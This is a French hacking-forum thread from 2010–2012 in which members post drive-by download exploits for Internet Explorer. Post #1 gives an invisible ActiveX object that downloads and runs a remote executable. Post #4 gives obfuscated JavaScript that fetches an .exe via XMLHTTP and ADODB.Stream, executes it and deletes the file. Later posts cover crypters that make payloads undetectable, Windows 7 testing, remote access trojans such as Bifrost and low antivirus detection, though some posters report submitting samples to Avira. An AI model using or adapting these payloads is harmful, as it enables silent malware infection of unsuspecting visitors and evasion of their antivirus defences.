Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 07-11-2010 15:18:30

drdarkhack
Banni(e)
Inscription : 03-10-2010
Messages : 17

Exploit ActiveX IE

Voici un exploit qui utilise l'activeX visant donc IE 6,7,8,9  il permet de télécharger et d'executer un executable a distance smile

</html>
</script>
</body>
<BODY>
<OBJECT ID="DownloaderActiveX1"
WIDTH="0"
HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="http://c6.community.alice.it/download/DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressbackground" VALUE="#bccee8">
<PARAM NAME="propTextbackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl" VALUE="http://votrelien.com/exemple.exe">
<PARAM NAME="propPostdownloadAction" VALUE="run">
<PARAM NAME="propInstallCompleteUrl" VALUE="">
<PARAM NAME="propbrowserRedirectUrl" VALUE="">
<PARAM NAME="propVerbose" VALUE="0">
<PARAM NAME="propInterrupt" VALUE="0">
</OBJECT>
</script>
</body>
</html>

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-11-2010 22:38:05

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Exploit ActiveX IE

sinon iframe transparente

mais je préfère le flash et l'action script (plus de possibilité non encore découverte je pense)

merci a toi

Dernière modification par Veidam (08-11-2010 01:31:14)

Hors Ligne

#3 08-11-2010 18:15:36

drdarkhack
Banni(e)
Inscription : 03-10-2010
Messages : 17

Re : Exploit ActiveX IE

mais je préfère le flash et l'action script

J'ai la meme opinion flash est très utiliser (contrairement a java ^^) deplus une faille flash touche toute les naviguateurs firefox,opera,internet explorer (contrairement a l'active X)
Et pis je kiff l'actionscript c'est le language le plus facile avec le VB.net et n'étant pas un super codeurs sa me plait smile

Dernière modification par drdarkhack (08-11-2010 18:16:49)

Hors Ligne

#4 08-11-2010 19:06:45

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Exploit ActiveX IE

sinon j'ai un code javascript ça ne fonctionne plus sous ie8 ou bien j'ai mal tester Avira même déconnecté peut l'avoir bloqué je reverrais quand j'aurais plus de temps

<script language="javascript">var ailian, zhan, cmdss;
ailian = "http://www.xxx.com/toto/uname.exe";
zhan = "uname.exe";
cmdss = "cmd.exe";
try {
  var ado = (document.createElement("object"));
  var d = 1;
  ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  var e = 1;
  var xml = ado.CreateObject("Microsoft.XMLHTTP", "");
  var f = 1;
  var ln = "Ado";
  var lzn = "db.St";
  var an = "ream";
  var g = 1;
  var as = ado.createobject(ln + lzn + an, "");
  var h = 1;
  xml.Open("GET", ailian, 0);
  xml.Send();
  as.type = 1;
  var n = 1;
  as.open();
  as.write(xml.responseBody);
  as.savetofile(zhan, 2);
  as.close();
  var shell = ado.createobject("Shell.Application", "");
  shell.ShellExecute(zhan, "", "", "open", 0);
  shell.ShellExecute(cmdss, " /c del /S /Q /F " + zhan, "", "open", 0);
}
catch (e){
}
;
</script>

smile

Dernière modification par Veidam (08-11-2010 21:26:59)

Hors Ligne

#5 10-11-2010 13:07:53

drdarkhack
Banni(e)
Inscription : 03-10-2010
Messages : 17

Re : Exploit ActiveX IE

Merci pour ton code smile
Ce javascript ne fonctionne que sous ie pas sous mozilla firefox  ?

(PS: Apparament ie a des failles énormes avec le javascript mais je crois que sa fonctionne pas avec firefox)

Hors Ligne

#6 10-11-2010 13:17:36

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Exploit ActiveX IE

non même ie8 ne l'execute pas ton code est bien meilleur et pourtant il date pas d'hier je l'avais vu a mes début sur le codage web mais il m'étais sortie de la tête

mais bon il peut être facilement fud ça j'y ai pas crue en le testant ils sont tous a la ramasse les AV

Hors Ligne

#7 14-11-2010 20:44:11

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Exploit ActiveX IE

malgré ceci Avira reste pour moi le meilleur antivirus gratuit

l'exploit leurs sera envoyé ainsi que le crypter utilisé pour que notre sécurité a tous perdure même si c'est pas encourageant... car il reste pleins d'autres possibilité de faire pareil

moi aussi je peut me faire avoir mais le faite de m'intéresser a la sécurité me permet de limiter les scripts kiddie

vidéo

Cordialement

Dernière modification par Veidam (15-11-2010 12:22:39)

Hors Ligne

#8 05-12-2010 14:42:09

obc
Nouveau membre
Inscription : 05-12-2010
Messages : 9

Re : Exploit ActiveX IE

sur xp sa passe mais win7 digère mal ton code mdr

Hors Ligne

#9 05-12-2010 17:22:11

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Exploit ActiveX IE

ah bon tu as tester pour dire ça moi oui et ça passe j'avais pas de w7 pour faire le teste 

argumente ou je te met une vidéo ^^ mdr pfff

edit : la preuve ici

note : le code a été envoyer a avira j'ai du mal le faire car il devrais le détecter depuis ...
          mais de toutes façon ce n'est pas le mieux il y encore plus fort mais bon ça je le garde pour moi ^^

Dernière modification par Veidam (05-12-2010 18:07:42)

Hors Ligne

#10 06-12-2010 03:09:29

obc
Nouveau membre
Inscription : 05-12-2010
Messages : 9

Re : Exploit ActiveX IE

la fille dans la pub m'a presque convaincu lorsqu'elle dit : W7, c'était mon idée! La 2e video, merci pour la dédicace, mais bof bof, c'est pas aussi convainquant que la fille.

Bon bon ...je rêve rarement à win la nuit alors je vais refaire le test et prendre quelques captures d'écran.  C'était sur w7/IE8 et le DEP c'est affolé.

Edit : Désolé, avec une calculette toute fraiche ca passe bien.  Le prob vient du crypteur utilisé avec mon .exe.  Pourtant win7 ne dit rien lorsque j'ouvre une calculette cryptée de l'ordi physiquement mais en "drive by" il n'aime pas ou p-e les paramètres de mon serveur... mais bon, ce sont des détails.

Dernière modification par obc (06-12-2010 06:02:42)

Hors Ligne

#11 06-12-2010 21:21:34

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Exploit ActiveX IE

obc a écrit :

la fille dans la pub m'a presque convaincu lorsqu'elle dit : W7, c'était mon idée!

moi ce qui m'a convaincu c'est quand elle dit "tu m'as entendu"

j'aime toucher a tout et ce coté ne me plait pas il trop scrip kiddie et trop facile coder un rat un crypter oui j'aime
mais il me semble très dur de faire mieux que bifrost alors pourquoi vouloir refaire la roue, je lui tire mon chapeau il est le rat par excellence

il y a mieux interface et options mais en reverse il est imparrable et il peut passer des réseaux nat et ça il ne le font pas tous

je ne te souhaiterais pas la bienvenue je t'explique pas...

de toutes façon j'ai plus grand choses à dire ici je vais sur des sites étranger je te laisse la place bonne échange quand même !

Hors Ligne

#12 07-12-2010 14:13:06

obc
Nouveau membre
Inscription : 05-12-2010
Messages : 9

Re : Exploit ActiveX IE

mmm qu'est-ce qui ne te plait pas ..trouver une faille ? ou mettre en ligne une faille ou l'on a qu'à changer un lien dans le code pour  en voir le résultat ? autre chose ?

Je ne veux pas refaire la roue mais j'aime bien comprendre comment elle tourne. Je suis loin de coder un RAT. J'ai étudié un peu les bases du sock 4/5, fais mon petit 'chat en LAN et c'est tout! .. un petit downloader aussi... Comment coder un crypteur, le fameux module RunPe (en vb), son fonctionnement, ces alternatives, Avira et l'heuristique (le malin tag Tr.Droper!) et tout le tralala. Je suis très loin d'être un Jedi mais je le sais et j'apprends à mon rythme.

Pour Bifrost je suis daccord aussi! La version native roule sur w7 et c'es pas le cas pour PI par exemple


Je dois t'avouer que je ne comprends pas exactement pourquoi tu me dis ça mais bon, je n'en ferai pas un plat. Peut-être ne suis-je pas assez expérimenté pour toi. Ou j'ai l'air d'un wanabe avec un humour médiocre ?! 

..et en + tu n'as + grand choses à dire ici ?!  wow j'ai manqué un bout je pense sérieux ?!! ton avant dernier post était constructif et rigolos! Honnêtement je suis nouveau ici et c'est cet atmosphère (comme dans ton avant dernier post) que je recherche. 

Tu as un statue de membre indispensable et tu aimes l'humour .. ca serait bien dommage que tu pars.


Bon soit j'ai manqué quelque chose entre tes 2 posts ou soit que tu n'as pas bu ton café ce matin là. 

p.s : en passant le code que j'ai testé est celui dans le 1er post, celui de drdarkhack. Je n'ai pas testé celui posté le 08-11-2010 18:06:45.

Hors Ligne

#13 08-12-2010 21:22:14

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Exploit ActiveX IE

le jedï c'est toi moi je suis un script kiddies ne m'en veut pas j'ai bu mon café et je passe a autre chose que le wifi
et personne n'est indispensable

Bienvenue

Dernière modification par Veidam (08-12-2010 21:52:57)

Hors Ligne

#14 08-12-2010 21:42:47

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Exploit ActiveX IE

http://analysis.avira.com/samples/detai … tid=678391

Avira a été prévenue bon surf a tous

ps un petit scan sur virus total et en espérant qu'il le file a tous le monde !!!

vive l'amour wink

Dernière modification par Veidam (06-02-2011 12:40:02)

Hors Ligne

#15 06-11-2011 14:49:57

toto
Membre V.I.P.
Lieu : chez le docteur aussi
Inscription : 15-01-2011
Messages : 221

Re : Exploit ActiveX IE

edit je retire cela ne fonctionne pas lol j'avais mal tester

Dernière modification par toto (06-11-2011 16:05:11)

Hors Ligne

#16 07-01-2012 10:33:06

toto
Membre V.I.P.
Lieu : chez le docteur aussi
Inscription : 15-01-2011
Messages : 221

Re : Exploit ActiveX IE

Salut tous le monde et tous mes vœux de prospérité vous accompagne

J'ai moins de temps moi aussi mais je reste un acharné de SI mes valeurs sont plus de sécurité pour Mr tous le monde !!!

J'ai donc envoyer l'exploit active X (une variante) sur virus total le résultat est amusant a voir 2/43
lien

Bonanééé

Hors Ligne

#17 07-01-2012 13:47:20

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Exploit ActiveX IE

Bien jouer wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
1 381 18-09-2016 12:54:01 par kcdtv
0 594 02-05-2016 17:28:50 par dookie
0 2816 13-07-2015 21:15:05 par JeanCharles
0 82 13-05-2015 20:29:35 par g0tmi1k
[remote-exploit.org] a par remote-exploit.org
0 792 03-06-2014 09:59:36 par remote-exploit.org

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]